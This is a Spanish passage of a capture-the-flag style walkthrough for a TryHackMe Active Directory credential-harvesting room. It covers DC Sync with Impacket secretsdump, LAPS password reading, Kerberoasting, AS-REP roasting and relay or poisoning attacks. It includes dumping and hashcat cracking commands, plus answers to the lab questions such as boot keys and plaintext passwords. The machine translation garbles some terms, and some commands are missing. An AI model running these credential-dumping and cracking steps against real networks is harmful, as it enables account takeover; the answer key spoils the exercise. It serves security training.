El ataque DC Sync es un ataque común que se realiza dentro de un entorno de Active Directory para extraer credenciales de forma remota. Este ataque funciona cuando se ve comprometida una cuenta (una cuenta especial con los permisos necesarios) o una cuenta de administrador de AD que tenga los siguientes permisos de AD:
- Replicación de cambios en el directorio
- Replicando todos los cambios del directorio
- Replicación de cambios de directorio en un conjunto filtrado
Un atacante aprovecha estas configuraciones para realizar una replicación de dominio, conocida comúnmente como «DC Sync» o sincronización del controlador de dominio. Para obtener más información sobre el ataque DC Sync, puede visitar la sala THM Persisting AD (Tarea 2).
La sala Persisting AD utiliza la herramienta Mimikatz para realizar el ataque de sincronización de DC. Demostremos el ataque utilizando una herramienta diferente, como el script Impacket SecretsDump.

Vamos a explicar el comando con más detalle.
- El -just-dc argumento es a favor de extraer los datos NTDS.
- es thm.red/AD_Admin_Userel usuario de dominio autenticado en el formato (dominio/usuario).
Tenga en cuenta que si estamos interesados en volcar solo los hashes NTLM, podemos usar el -just-dc-ntlm argumento de la siguiente manera:
Elcorriente continuaAtaque de sincronización para volcarNTLMHashes
user@machine$python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/<AD_Admin_User>@10.67.159.242
Una vez que obtenemos los hashes, podemos usar el hash de un usuario específico para suplantar su identidad o descifrarlo usando herramientas de descifrado hashcat. Podemos usar el -m 1000modo hashcat para descifrar los hashes NTLM de Windows de la siguiente manera:
Descifrando los hashes
user@machine$hashcat -m1000-a0/path/to/ntlm_hashes.txt /path/to/wordlist/such/as/rockyou.txt
Responda las siguientes preguntas
Aplique la técnica descrita en esta tarea para volcar el archivo NTDS localmente y extraer los hashes. ¿Cuál es el valor de la clave de arranque del sistema de destino? Nota : ¡Utilice thm.red/thm como usuario de Active Directory, ya que tiene privilegios de administrador!
0x36c8d26ec0df8b23ce63bcefa6e2d821
¿Cuál es la contraseña en texto plano para el nombre de usuario bk-admin ?
Passw0rd123

Tarea 8 Solución de contraseñas de administrador local (LAPS)
Esta tarea describe cómo enumerar y obtener la contraseña de un administrador local dentro del entorno de Active Directory si la función LAPS está configurada y habilitada.
Preferencias de Política de Grupo (GPP)
Windows Cuenta con una cuenta de administrador integrada a la que se puede acceder mediante una contraseña. Cambiar las contraseñas en un entorno Windows extenso con muchos equipos resulta complejo. Por ello, Microsoft implementó un método para cambiar las cuentas de administrador locales en todas las estaciones de trabajo mediante las Preferencias de Directiva de Grupo (GPP).
GPP es una herramienta que permite a los administradores crear directivas de dominio con credenciales integradas. Una vez que se implementa GPP, diferentes XML Los archivos se crean en la carpeta SYSVOL. SYSVOL es un componente esencial de Active Directory y crea un directorio compartido en un volumen NTFS al que todos los usuarios autenticados del dominio pueden acceder con permisos de lectura.
El problema era relevante para el GPP.XML Los archivos contenían una contraseña cifrada mediante AES-Cifrado de 256 bits. En aquel entonces, el cifrado era suficientemente seguro hasta que Microsoft publicó su clave privada en MSDN.Dado que los usuarios del dominio pueden leer el contenido de la carpeta SYSVOL, resulta fácil descifrar las contraseñas almacenadas. Una de las herramientas para descifrar la contraseña cifrada de SYSVOL es Get-GPPPassword..
Solución de contraseñas de administrador local (LAPS)
En 2015, Microsoft eliminó el almacenamiento de la contraseña cifrada en la carpeta SYSVOL. Introdujo la Solución de Contraseña de Administrador Local (LAPS), que ofrece un método mucho más seguro para administrar de forma remota la contraseña de administrador local.
El nuevo método incluye dos nuevos atributos (ms-mcs-AdmPwd y ms-mcs-AdmPwdExpirationTime) de los objetos de equipo en Active Directory. El ms-mcs-AdmPwdatributo contiene una contraseña en texto plano del administrador local, mientras que ms-mcs-AdmPwdExpirationTime contiene el tiempo de expiración para restablecer la contraseña. LAPS utiliza admpwd.dllpara cambiar la contraseña del administrador local y actualizar el valor de ms-mcs-AdmPwd.

Enumerar para LAPS
La máquina virtual proporcionada tiene LAPS habilitado, así que comencemos a enumerarla. Primero, verificamos si LAPS está instalado en la máquina de destino, lo cual se puede hacer comprobando la admpwd.dll ruta.
Enumeración para LAPS

La salida confirma que tenemos LAPS en la máquina. Vamos a comprobar los comandos disponibles para usar con AdmPwdlos cmdlets, como se indica a continuación:
Listado de cmdlets de PowerShell disponibles para LAPS

A continuación, necesitamos encontrar qué unidad organizativa (OU) de AD tiene el atributo «Todos los derechos extendidos» que gestiona LAPS. Usaremos el cmdlet «Find-AdmPwdExtendedRights» para obtener la OU correcta. Tenga en cuenta que la obtención de las OU disponibles se puede realizar en el paso de enumeración. Nuestra OU objetivo en este ejemplo es THMorg. Puede usar el -Identity * argumento para listar todas las OU disponibles.
Cómo encontrar usuarios con el atributo AdmPwdExtendedRights

El resultado muestra que el THM GroupReader grupo THM org tiene el acceso correcto a LAPS. Vamos a comprobar el grupo y sus miembros.

Obtener la contraseña
Descubrimos que el bk-admin usuario es miembro de THM GroupReader, por lo que para obtener la contraseña de LAPS, necesitamos comprometer o suplantar la identidad del usuario bk-admin. Tras comprometer al usuario correcto, podemos obtener la contraseña de LAPS mediante Get-AdmPwdPasswordel cmdlet, habilitando LAPS en la máquina objetivo.

Es importante tener en cuenta que, en un entorno de Active Directory real, LAPS solo está habilitado en máquinas específicas. Por lo tanto, es necesario enumerar y encontrar el equipo de destino correcto, así como la cuenta de usuario correcta, para poder obtener la contraseña de LAPS. Existen muchos scripts que pueden ayudar con esto, pero hemos incluido LAPSToolkit.Ingresa el script de PowerShell C:\Tool para probarlo.
Responda las siguientes preguntas
¿Qué grupo tiene ExtendedRightHolder y puede leer la contraseña de LAPS?
LAPsReader
Sigue la técnica descrita en esta tarea para obtener la contraseña de LAPS. ¿Cuál es la contraseña de LAPS para el ordenador Creds-Harvestin ?
THMLAPSPassw0rd
¿Qué usuario puede leer las contraseñas de LAPS?
bk-admin

Tarea 9 Otros ataques
En las tareas anteriores, se partía de la base de que ya teníamos acceso inicial a un sistema e intentábamos obtener credenciales de la memoria o de diversos archivos del sistema operativo Windows. En otros escenarios, es posible realizar ataques en la red de la víctima para obtener credenciales.
Esta tarea presentará brevemente algunas de las ventanas y ataques que se pueden utilizar para obtener los hashes. Antes de profundizar más detalles del ataque, le sugerimos que se familiarice con Kerberos y el nuevo gestor de LAN de tecnología (NTLM), un conjunto de protocolos de seguridad utilizados para autenticar a los usuarios.
Kerberoasting
El Kerberoasting es un juego común ataque para obtener boletos que ayudan con persistencia Para que este ataque funcione, un adversario debe tener acceso a cuentas SPN (Service Principal Name) como IIS Usuario, MSSQL, etc. El ataque Kerberoasting implica solicitar un Ticket Granting Ticket (TGT) y el Servicio de Concesión de Tickets (TGS). El objetivo final de este ataque es permitir la escalada de privilegios y el movimiento lateral en la red. Para obtener más detalles sobre el ataque, puede visitar el THM Persistente habitación (Tarea 3).
Vamos a hacer una demostración rápida sobre el ataque. Primero, necesitamos encontrar una o más cuentas SPN, y luego podemos enviar una solicitud para obtener un ticket TGS. Realizaremos el ataque Kerberoasting desde AttackBox usando el script de Python GetUserSPNs.py. Recuerda usar el THM.rojo/ellos cuenta con Passw0rd! como contraseña.

El comando anterior es sencillo: proporcionamos la dirección IP del controlador de dominio y el nombre de dominio\nombre de usuario. A continuación, el script GetUserSPNs solicita la contraseña del usuario para recuperar la información necesaria.
El resultado reveló que tenemos una cuenta SPN, svc-user. Una vez que encontremos el usuario SPN, podemos enviar una única solicitud para obtener un ticket TGS para el usuario srv-user utilizando el argumento -request-user.

Ahora, se trata de descifrar el ticket TGS obtenido utilizando la herramienta HashCat en -m 13100el siguiente modo:
Descifrando el ticket de TGS usando Hashcat
user@machine$hashcat -a0-m13100spn.hash /usr/share/wordlists/rockyou.txt
Intenta replicar los pasos en la máquina virtual adjunta: encuentra el usuario SPN y realiza el ataque Kerberoasting. Una vez que obtengas el ticket, descifralo y responde a la pregunta que aparece a continuación.
AS-REP Asado
AS-REP Roasting es una técnica que permite al atacante obtener hashes de contraseñas de usuarios de Active Directory cuyas opciones de cuenta están configuradas para » No requerir pre autenticación Kerberos». Esta opción se basa en el antiguo protocolo de autenticación Kerberos, que permite la autenticación sin contraseña. Una vez obtenidos los hashes, se puede intentar descifrarlos sin conexión y, si es posible, ¡se obtiene la contraseña!

La máquina virtual adjunta tiene uno de los usuarios de AD configurado con la opción «No requerir preautenticación Kerberos». Antes de realizar el análisis AS-REP, necesitamos una lista de cuentas de dominio que se debe obtener durante la enumeración. En nuestro caso, creamos una users.lst lista en el directorio tmp. A continuación, se muestra el contenido de nuestra lista, que se debe obtener durante el proceso de enumeración.
Administrator
admin
thm
test
sshd
victim
CREDS-HARVESTIN$
En esta ocasión utilizaremos el script Impacket Get-NPUsers de la siguiente manera:

Especificamos la dirección IP del controlador de dominio con el -dc-ip argumento y proporcionamos una lista de usuarios del dominio para la verificación. Una vez que la herramienta encuentra al usuario correcto sin configuración de preautenticación, generará el ticket.
Varias herramientas de ciberseguridad y hacking también permiten descifrar los TGT extraídos de Active Directory, incluyendo Rubeus y Hashcat. Impacket GetNPUsers tiene la opción de exportar tickets en formato John o hashcat usando el -format argumento .
PYME Ataque por relevos
El PYME El ataque de retransmisión abusa del NTLM mecanismo de autenticación (NTLM de desafío-respuesta). El atacante realiza un ataque de intermediario (Man-in-the-Middle) para monitorear y capturar PYME paquetes y extraer hashes. Para que este ataque funcione, PYME La firma debe estar desactivada. PYME La firma es una verificación de seguridad para integridad y garantiza que la comunicación se realice entre fuentes de confianza.
Le sugerimos que revise elTHMExplotación espacio para más información sobre el PYME ataque de relevos.
LLMNR Intoxicación por NBNS
Resolución de nombres de multidifusión de enlace local (LLMNR) y NetBIOS El servicio de nombres (NBT-NS) ayuda a las máquinas de la red local a encontrar la máquina correcta si DNS falla. Por ejemplo, supongamos que una máquina dentro de la red intenta comunicarse con una que no existe. DNS registro ( DNS no se resuelve). En ese caso, la máquina envía mensajes multicast a todas las máquinas de la red solicitando la dirección correcta a través de LLMNR o NBT-NS.
El NBNS/ LLMNR El envenenamiento ocurre cuando un atacante suplanta una fuente autorizada en la red y responde a la resolución de nombres de multidifusión local de enlace (LLMNR) y NetBIOS Tráfico del Servicio de Nombres (NBT-NS) al host solicitado con el servicio de identificación de host. Si desea obtener más información sobre el ataque, le sugerimos que consulte THM Violación habitación.
El objetivo final para PYME relé y LLMNR Los ataques de envenenamiento de NBNS tienen como objetivo capturar la autenticación. NTLM hashes para una víctima, lo que ayuda a obtener acceso a la cuenta o máquina de la víctima.
Responda las siguientes preguntas
Enumerar los usuarios de SPN usando el script Impacket GetUserSPNs. ¿Cuál es el nombre principal de servicio para el controlador de dominio?
svc-thm
Tras encontrar la cuenta SPN de la pregunta anterior, realiza un ataque Kerberoasting para obtener el ticket TGS y descifrarlo. ¿Cuál es la contraseña?
Passw0rd1


Tarea 10 Conclusión
Resumen
En esta sala, analizamos los distintos métodos para obtener las credenciales de los usuarios, incluyendo el ordenador local y el controlador de dominio, lo que nos lleva a las siguientes conclusiones:
- Hablamos sobre cómo acceder a la memoria de Windows, volcar un proceso LSASS y extraer hashes de autenticación.
- Hablamos sobre el Administrador de credenciales de Windows y los métodos para extraer contraseñas.
- Introdujimos la función LAPS de Windows y la analizamos para encontrar el usuario y el objetivo correctos para extraer las contraseñas.
- Presentamos ataques que permitieron extraer y compartir las credenciales de los usuarios.
Las siguientes herramientas pueden ser útiles para analizar una máquina objetivo (archivos, memoria, etc.) en busca de información confidencial. Recomendamos probarlas durante la fase de enumeración.

Sigan entrenando, Hacketones, Nos vemos en el próximo laboratorio!!!